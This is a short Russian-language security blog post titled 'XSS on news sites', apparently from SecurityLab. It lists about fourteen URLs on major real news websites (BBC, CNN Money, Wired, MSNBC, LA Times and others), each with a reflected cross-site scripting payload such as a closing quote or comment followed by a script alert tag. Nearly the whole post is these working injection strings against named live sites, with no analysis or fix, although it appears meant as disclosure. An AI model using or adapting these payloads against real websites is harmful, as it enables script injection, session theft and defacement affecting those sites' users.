XSS на новостных сайтах

XSS на новостных сайтах

www.chicagotribune.com/shopping/?track=ShoppingTab "><script>alert('www.securitylab.ru')</script>

www.villagevoice.com/home/index.php?page=categpage--><script>alert( 'www.securitylab.ru')</script>&categ=Features&categlabel=Features&lab_id=4

www.csmonitor.com/csmonitor/web/guest/emailServices/signup?s=pcf&email=Your%20email%20address "><script>alert('www.securitylab.ru')</script>

www.latimes.com/classified/genmerch/results.classified?class=**3905%2D3940**,%2066005,%2066010,%2066015,%2066020,%2066025,%2066030,%2066035,%2066040 "><script>alert('www.securitylab.ru')</script>

www.cnet.com/2001-1_1-0.html?tag=--><script>alert( 'www.securitylab.ru')</script>
news.zdnet.com/2100-3513_22-6102226.html?X--><script>alert()</script>

www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today "><script>alert('www.securitylab.ru')</script>

money.cnn.com/.element/ssi/data/1.0/hotstocks.exclude.html?uid=%7B38B942FF%2D0B95%2D437C%2DAC98%2D129FF9653198%7D"><script>alert('www.securitylab.ru')</script>

wired.com/wireservice/headlines.php?section=Breaking&firstStory=1--><script>alert()</script>&nosubnav=true

www.cbc.ca/programguide/schedule/dailySchedule.jsp?network=CBC%20Radio%20One "></a><script>alert('www.securitylab.ru')</script>

www.msnbc.msn.com/?id/3053419&qp=81756 '></script><script>alert('www.securitylab.ru')</script>

news.aol.com/nation/story/_a/bomb-threat-shuts-down-new-york-hospital/n20060819000509990011?cid=505');"></a><script>alert('www.securitylab.ru')</script>

www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--><script>alert( 'www.securitylab.ru')</script>

www.dailybruin.ucla.edu/news/packages.asp?ID=43&Date=1 ');"></a><script>alert('www.securitylab.ru')</script>
Security
Alt text

Подписывайтесь на каналы "SecurityLab" в TelegramTelegram и TwitterTwitter, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

Валерий Марчук

Блог посвящен безопасности и жизни секлаба